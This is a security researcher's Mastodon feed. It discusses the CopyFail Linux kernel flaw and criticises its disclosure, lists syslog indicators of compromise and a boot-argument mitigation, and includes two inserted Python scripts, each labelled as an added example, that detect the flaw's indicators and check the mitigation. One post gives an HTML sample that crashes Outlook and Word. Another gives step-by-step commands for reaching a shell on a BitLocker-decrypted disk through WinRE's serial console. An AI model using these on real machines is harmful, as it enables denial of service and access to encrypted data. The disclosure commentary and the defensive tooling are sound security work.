Posts by wdormann@infosec.exchange
 (DIR) Post #B5mIdphyhopfDNlT1s by wdormann@infosec.exchange
       2026-04-28T19:13:32Z
       
       0 likes, 0 repeats
       
       @dead_man Yeah, the irony here is that my 9-year-old Pixel 2 had a more current patch level than my new-from-carrier S26.
       
 (DIR) Post #B5p5ykKHCE1MfoCSSe by wdormann@infosec.exchange
       2026-04-29T18:37:29Z
       
       0 likes, 0 repeats
       
       So CopyFail CVE-2026-31431 is a thing.

       If you're on the Ubuntu platform, 26.04 is not affected.  18.04 through 25.10 are indeed affected, but no fixes are available.

       If you're on another platform, check with your vendor for update availability.
       
 (DIR) Post #B5p5ylOZDl2zzPDOmu by wdormann@infosec.exchange
       2026-04-29T18:55:18Z
       
       0 likes, 0 repeats
       
       If you're using an obscure distro like "Debian", you may not have a fix available.
       
 (DIR) Post #B5p5ymMTd0yAzDFFAW by wdormann@infosec.exchange
       2026-04-29T20:28:39Z
       
       0 likes, 0 repeats
       
       Or RHEL.

       I suspect that some people use that?
       
 (DIR) Post #B5p5ynE0PzmtfEHzbU by wdormann@infosec.exchange
       2026-04-30T12:46:21Z
       
       1 likes, 1 repeats
       
       While this vulnerability seems to be discovered using AI ("Xint Code"), I have to assume that they also let the AI decide how to do the vulnerability coordination as well.

       "major builds are out as of this writing"  😂
       No distros have official updates for CVE-2026-31431. Fedora 42 and newer have updates, but no official advisory or acknowledgement of CVE-2026-31431. So with them it's unclear if it's even intentional. Red Hat, Ubuntu, Amazon Linux, and SUSE all have advisories as of now, but NO updates.

       "disable the algif_aead module as a mitigation."  😂
       Bespoke distros like RHEL don't use a module, it's compiled into the kernel.

       I can't figure out what the Xint Code angle is with this copyfail stuff.  On one hand, yes, it is a true vulnerability that affects a LOT of Linux distros available.  And they did submit the bug for fixing to the upstream kernel people.

       BUT the CVE has only existed for a week.  And NONE of the distros IN THEIR ADVISORY had updates available at the time that they pulled the trigger for publication of the shiny copy.fail website.

       I struggle to think of how this even happens.  In all my years of infosec, you're either on board with doing CVD (e.g. coordinating with the former CERT/CC) or you're not (dropping 0day).  But this all fits bizarrely in the middle.  The publication gives the guise that they did the right thing (and please use our AI services).  But at the same time, they clearly chose to release the vulnerability details and functional exploit before any distro had the ability to properly do anything about it.

       Either these Xint Code people have a hidden agenda or ulterior motive that we aren't aware of yet.  Or they're just really bad at coordinated vulnerability disclosure.  You pick.
       
 (DIR) Post #B5p5yrv2xuaqDsSQFM by wdormann@infosec.exchange
       2026-04-30T13:38:34Z
       
       0 likes, 0 repeats
       
       If you're curious about IOCs for copyfail, look in syslog for:

       NET: Registered PF_ALG protocol family

       for attempts to exploit copyfail on systems that use the vulnerable code as a module. For systems that have the vulnerable code compiled into the kernel, like RHEL, you'll see this line on every boot.

       And at least for this particular flavor of exploit, a wall-clock nearby:

       process 'su' launched '/bin/sh' with NULL argv: empty string added

       is an indication of successful exploitation.

       But it's worth noting that the "process launched" stuff is merely what the ITW PoC will leave behind.  More clever exploitation may not be as obvious.
       
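       The two IOCs above, as a scanner run over constructed syslog lines. This is an added example and not code from the post; it encodes the post's own caveats as severities (a PF_ALG registration is noise on a kernel with af_alg built in, since a built-in family registers exactly once per boot, and the "NULL argv" line is only what the public PoC leaves behind). The sample log, the severity names, and the decision to judge "built in" from modules.builtin are my assumptions.

```python
"""Scan syslog-style lines for the two CopyFail (CVE-2026-31431) indicators
named in the post above.  Added example, not code from the original post.

Caveats the post makes, encoded here as severities:
  * "NET: Registered PF_ALG protocol family" only says the AF_ALG socket
    family was initialised.  Built into the kernel (e.g. RHEL) it shows up
    once on every boot and is noise; as a module it appears the first time
    something creates an AF_ALG socket, which may be an exploit attempt or
    a legitimate user of the kernel crypto API.
  * the "launched ... with NULL argv" line is what the public PoC leaves
    behind.  A different exploit may leave nothing.
"""
import re
import sys
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, List

PF_ALG_REGISTERED = "NET: Registered PF_ALG protocol family"
# Kernel warning for an exec with an empty argv; the PoC triggers it via
# su -> /bin/sh.  Tolerates the missing closing quote seen in the post.
NULL_ARGV_RE = re.compile(
    r"process '(?P<proc>[^']+)' launched '(?P<bin>[^' ]+)'? with NULL argv"
)
# First kernel line of a boot; resets the "seen this boot" state.
BOOT_RE = re.compile(r"kernel: (?:\[\s*0\.0+\] )?Linux version ")


@dataclass
class Hit:
    line_no: int
    kind: str      # "pf_alg_registered" or "null_argv_exec"
    severity: str  # "info", "suspicious" or "high"
    text: str


def pf_alg_is_builtin(modules_builtin: str) -> bool:
    """True if af_alg is compiled in, judged from the text of
    /lib/modules/$(uname -r)/modules.builtin (one .ko path per line)."""
    return any(ln.strip().endswith("/af_alg.ko") for ln in modules_builtin.splitlines())


def scan(lines: Iterable[str], pf_alg_builtin: bool) -> List[Hit]:
    """Classify each line.  On a built-in kernel the first PF_ALG
    registration after a boot banner is expected; any other registration
    (module kernel, or a second one in the same boot) means something
    opened an AF_ALG socket and deserves a look."""
    hits: List[Hit] = []
    seen_this_boot = False
    for n, line in enumerate(lines, 1):
        if BOOT_RE.search(line):
            seen_this_boot = False
            continue
        if PF_ALG_REGISTERED in line:
            sev = "info" if (pf_alg_builtin and not seen_this_boot) else "suspicious"
            seen_this_boot = True
            hits.append(Hit(n, "pf_alg_registered", sev, line.rstrip()))
            continue
        if NULL_ARGV_RE.search(line):
            hits.append(Hit(n, "null_argv_exec", "high", line.rstrip()))
    return hits


def summarize(hits: Iterable[Hit]) -> Counter:
    """Count hits by (kind, severity) for a quick triage view."""
    return Counter((h.kind, h.severity) for h in hits)


# Constructed sample log, not captured data: a boot, a second PF_ALG
# registration hours later, and the PoC's tell-tale exec line.
SAMPLE_SYSLOG = """\
Apr 30 08:00:01 host kernel: [    0.000000] Linux version 6.12.0-sample (constructed)
Apr 30 08:00:02 host kernel: NET: Registered PF_ALG protocol family
Apr 30 13:21:44 host kernel: NET: Registered PF_ALG protocol family
Apr 30 13:21:45 host kernel: process 'su' launched '/bin/sh' with NULL argv: empty string added
Apr 30 13:22:00 host sshd[1234]: Accepted publickey for alice from 10.0.0.5 port 51234
"""

if __name__ == "__main__":
    # Usage: python copyfail_ioc.py /var/log/syslog /lib/modules/$(uname -r)/modules.builtin
    if len(sys.argv) == 3:
        with open(sys.argv[2]) as f:
            builtin = pf_alg_is_builtin(f.read())
        with open(sys.argv[1], errors="replace") as f:
            found = scan(f, builtin)
    else:
        found = scan(SAMPLE_SYSLOG.splitlines(), True)
    for h in found:
        print(f"{h.severity:10} line {h.line_no}: {h.text}")
    print(dict(summarize(found)))
```

       Run without arguments it scans the constructed sample as a built-in kernel (info, suspicious, high); with a syslog path and a modules.builtin path it scans the real thing. The kernel emits the NULL argv warning with pr_warn_once, so it appears at most once per boot even if the PoC runs repeatedly.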
 (DIR) Post #B5q3N1LnRghDifkpSC by wdormann@infosec.exchange
       2026-04-30T18:37:32Z
       
       1 likes, 0 repeats
       
       What went wrong with this case?

       Theori appear to have only contacted the linux kernel devs with the vulnerability, as opposed to going the usual CVD route that includes all of the major Linux distros.

       Why is this a problem?  Since the linux kernel became a CNA, there has been a flood of CVEs for the Linux kernel.  The Linux kernel devs' argument is that any given kernel flaw could presumably be leveraged to behave as a vulnerability, and it's not worth their time to determine "vulnerability" or "not a vulnerability".  Everything gets a CVE.

       Now the case with copy.fail?  It was indeed reported to the kernel devs.  And it got a CVE.  A single CVE buried in the flood of all of the Linux kernel CVEs.

       And it appears that every distro on the planet was blindsided by this proven-exploitable vulnerability because they were not given any warning.  Or even any suggestion to pick this single CVE out of the sea of Linux kernel CVEs as worth cherry picking.

       Much to the chagrin of the Linux devs, RHEL doesn't use up-to-date Linux kernels.  They cherry pick CVEs to backport to their chosen kernel version.  (e.g. the latest and greatest RHEL 10.1 uses 6.12.0, which was released November 17 2024).  And in this world where bad actors like Theori don't involve vendors in vulnerability coordination, and just about every Linux kernel bug gets a CVE, this workflow fails. Hard.

       Good times...
       
 (DIR) Post #B5q3N6QaZIV5Sz2E7M by wdormann@infosec.exchange
       2026-04-30T22:49:41Z
       
       0 likes, 0 repeats
       
       Unlike what the buffoons at Theori published as a "mitigation", the folks at Red Hat actually published a viable mitigation for CopyFail CVE-2026-31431.

       Specifically, edit your grub (or whatever you use to load your kernel) configuration to have one of the following arguments:

       initcall_blacklist=algif_aead_init
       initcall_blacklist=af_alg_init
       initcall_blacklist=crypto_authenc_esn_module_init

       With such boot arguments to the Linux kernel, the affected bits won't be reachable.
       
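       A way to verify that the boot-argument mitigation above is actually in effect on a running box, as an added example (not code from the post or from Red Hat). It parses the kernel command line for any of the three initcall_blacklist entries, then probes the crypto API the way an unprivileged user would: open an AF_ALG socket and bind the "aead" type. The assumptions are mine: if af_alg_init never ran, socket() fails with EAFNOSUPPORT; if the aead type was never registered, bind() fails with ENOENT; gcm(aes) is just a representative AEAD name, and an ENOENT can also mean that one algorithm is missing.

```python
"""Check whether the Red Hat boot-argument mitigation for CopyFail
(CVE-2026-31431) in the post above is actually in effect.  Added example,
not code from the original post or from Red Hat.

Two checks:
  1. static: parse the kernel command line (/proc/cmdline) for an
     initcall_blacklist= value naming one of the three init functions.
  2. runtime (Linux only): open an AF_ALG socket and bind the "aead"
     type.  If af_alg_init never ran the socket family does not exist
     and socket() fails with EAFNOSUPPORT; if the aead type was never
     registered, bind() fails with ENOENT.  A successful bind means the
     AEAD interface is still reachable from an unprivileged process.
"""
import errno
import socket
from typing import Set

COPYFAIL_INITCALLS = {
    "algif_aead_init",
    "af_alg_init",
    "crypto_authenc_esn_module_init",
}


def parse_initcall_blacklist(cmdline: str) -> Set[str]:
    """Collect every function named by initcall_blacklist= on the command
    line.  The parameter may appear more than once and each value is a
    comma-separated list."""
    names: Set[str] = set()
    for tok in cmdline.split():
        if tok.startswith("initcall_blacklist="):
            names.update(n for n in tok.split("=", 1)[1].split(",") if n)
    return names


def copyfail_mitigated_by_cmdline(cmdline: str) -> bool:
    """True if any of the three init functions is blacklisted (exact
    name match; a typo in the argument silently does nothing)."""
    return bool(parse_initcall_blacklist(cmdline) & COPYFAIL_INITCALLS)


def probe_af_alg_aead(alg: str = "gcm(aes)") -> str:
    """Runtime probe.  Returns one of:
      "no_af_alg"    socket family absent (af_alg_init blacklisted)
      "no_aead"      aead type absent (algif_aead_init blacklisted), or
                     `alg` itself not available on this kernel
      "reachable"    an unprivileged user can still bind AEAD via AF_ALG
      "unsupported"  not Linux
      "error:<NAME>" some other errno (e.g. a seccomp sandbox)"""
    if not hasattr(socket, "AF_ALG"):
        return "unsupported"
    try:
        s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
    except OSError as e:
        if e.errno == errno.EAFNOSUPPORT:
            return "no_af_alg"
        return "error:" + errno.errorcode.get(e.errno, str(e.errno))
    try:
        s.bind(("aead", alg))
    except OSError as e:
        if e.errno == errno.ENOENT:
            return "no_aead"
        return "error:" + errno.errorcode.get(e.errno, str(e.errno))
    finally:
        s.close()
    return "reachable"


if __name__ == "__main__":
    with open("/proc/cmdline") as f:
        cmdline = f.read()
    print("blacklisted initcalls:", sorted(parse_initcall_blacklist(cmdline)) or "none")
    print("cmdline mitigation   :", copyfail_mitigated_by_cmdline(cmdline))
    print("AF_ALG aead probe    :", probe_af_alg_aead())
```

       The static check only reports what the running kernel was booted with, so edit grub, regenerate the config, reboot, and then run this; a "reachable" result after that means the argument did not take (wrong name, wrong boot entry, or the crypto code is still loadable as a module on that distro).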
 (DIR) Post #B5qfs42TITSvIBwdxw by wdormann@infosec.exchange
       2026-04-30T19:03:02Z
       
       1 likes, 0 repeats
       
       @k8ie Yes, it's clear that it was published as a "Look at us!" vehicle.

       But their abysmally bad coordination put every Linux user on the planet at risk, and is clear evidence that they don't care about anybody other than themselves.
       
 (DIR) Post #B5rP2JkMFKZ6qIjffs by wdormann@infosec.exchange
       2026-05-01T02:01:08Z
       
       0 likes, 0 repeats
       
       @joshbressers @Viss If only there were human beings out there who had any sort of experience with coordinating vulnerabilities...  😂
       
 (DIR) Post #B670TWpCLE7KthEkQS by wdormann@infosec.exchange
       2026-05-08T03:31:00Z
       
       0 likes, 0 repeats
       
       The 3 recent Linux LPEs are sort of interesting in that each one took a different path from discovery to disclosure.

       Copy Fail: Publicity stunt where they claim to have done the right thing, yet didn't bother to tell a single distro vendor, and lied about updates being available.

       Dirty Frag: Attempted to do proper coordination, including notifying the linux-distros mailing list.  But the embargo was broken, so it was disclosed unexpectedly ahead of time.

       Copy Fail 2: Discovered as an n-day by looking at kernel commit logs and Spender noticing that it was copyfail-class.

       Each path had basically exactly the same outcome (No fixes at publication time).  😂
       
 (DIR) Post #B670TYXBz8u2CQpOdc by wdormann@infosec.exchange
       2026-05-08T12:51:40Z
       
       0 likes, 1 repeats
       
       And just to clarify about "Dirty Frag" vs. "Copy Fail 2":

       Dirty Frag is TWO vulnerabilities:
       The xfrm-ESP Page-Cache Write vulnerability has been assigned CVE-2026-43284 and patched in mainline at f4c50a4034e6.
       The RxRPC Page-Cache Write vulnerability has been reserved as CVE-2026-43500 for tracking; no patch exists in any tree yet.

       Copy Fail 2 is a "clean room" rediscovery/exploitation of f4c50a4034e6 (CVE-2026-43284).

       Since Copy Fail 2 was published to GitHub 1 hour earlier than Dirty Frag was published, the Dirty Frag writeup specifies that the embargo was broken, and as a result TWO vulnerabilities were disclosed.

       Personally, I think that if you publish a patch for a vulnerability, and then you begin an embargo a week after it was published, that doesn't really count as an "embargo"?  🤷‍♂️

       Fun stuff...
       
 (DIR) Post #B69xCPo5SofZovkGVU by wdormann@infosec.exchange
       2026-05-10T13:47:38Z
       
       1 likes, 0 repeats
       
       Remember the early days of Uber and Lyft, when rides were dirt cheap because the companies were operating at a loss in order to capture the minds/wallets of the masses?The rug pull in the AI/LLM world when the companies adjust pricing to actually make a profit is going to be spectacular. Especially when you consider the numbers of people / orgs that are addicted to or dependent on such technology.
       
 (DIR) Post #B6OLiapSSWTfIS5yb2 by wdormann@infosec.exchange
       2026-05-15T04:23:43Z
       
       1 likes, 1 repeats
       
       Stolen from the bad site:

       GNU people:
       ls is more than enough characters.

       PowerShell people:
       How about Remove-MgIdentityAuthenticationEventFlowAsOnGraphAPretributeCollectionExternalUserSelfServiceSignUpAttributeIdentityUserFlowAttributeByRef ?
       
 (DIR) Post #B6kpZeS870qH42Ip3g by wdormann@infosec.exchange
       2026-05-27T17:59:15Z
       
       1 likes, 0 repeats
       
       Neat.

       An unprivileged user can crash Windows if it has a USB printer driver loaded.

       No CVE because it doesn't meet MSRC's bar for servicing.
       
 (DIR) Post #B6xDH9i6OzutIp0RBw by wdormann@infosec.exchange
       2026-05-30T13:56:42Z
       
       0 likes, 0 repeats
       
       LOL.  From over at the bad site:

       An HTML email will crash Outlook.

       Granted, it's "harmless" (stack overflow (exhaustion)), but I dunno... I sort of expect the act of rendering an HTML email that uses CSS to not crash my mail client?
       
 (DIR) Post #B6xDHAiqdi6iRQMXzc by wdormann@infosec.exchange
       2026-05-30T14:13:22Z
       
       1 likes, 0 repeats
       
       I'm no expert, but I get the impression that Microsoft Word is perhaps not the best choice for rendering HTML content.

       But what else is Outlook supposed to use to render HTML emails?  😂
       
 (DIR) Post #B6xDHFS13ic96fWfx2 by wdormann@infosec.exchange
       2026-05-30T16:38:34Z
       
       1 likes, 0 repeats
       
       If you want a more minimal HTML sample that will crash Word/Outlook, this will still do it:

       <html><table><div style="mso-element:field-begin" /><table><div style="mso-element:field-begin;">listnum</div><div style="mso-element:field-end;" /></table></table></html>
       
 (DIR) Post #B72A82kFbMRd1Om2ee by wdormann@infosec.exchange
       2026-06-05T20:19:26Z
       
       2 likes, 1 repeats
       
       Well, bitskrieg is public.

       While Microsoft "fixed" YellowKey as CVE-2026-45585 (and by "fixed", I mean they have provided manual steps that you can perform if you want to remove autofstx.exe from the WinRE registry BootExecute value), bitskrieg still works on such a system to achieve the same goal.  Though it requires a second computer, or a device that can communicate on a serial port.

       Boot into WinRE
       Go to a command prompt, ignoring the prompt to enter a BitLocker recovery key.  (Click Skip this drive)
       Enable the serial port in WinRE:
       bcdedit /set ems 1
       bcdedit /set emsport 1
       Reboot back into WinRE
       From your other computer, connect to the serial port.
       Type:
       cmd
       esc
       tab
       - Enjoy your cmd.exe prompt (over serial) with a decrypted (assuming it's TPM-only) hard disk.
       
 (DIR) Post #B78CzNTUcp2TWCFqqG by wdormann@infosec.exchange
       2026-06-08T17:54:07Z
       
       1 likes, 0 repeats
       
       TIL that titanium cutting boards are a thing.

       Who is the target audience for such things?  Families with little kids, where sharp things are to be avoided?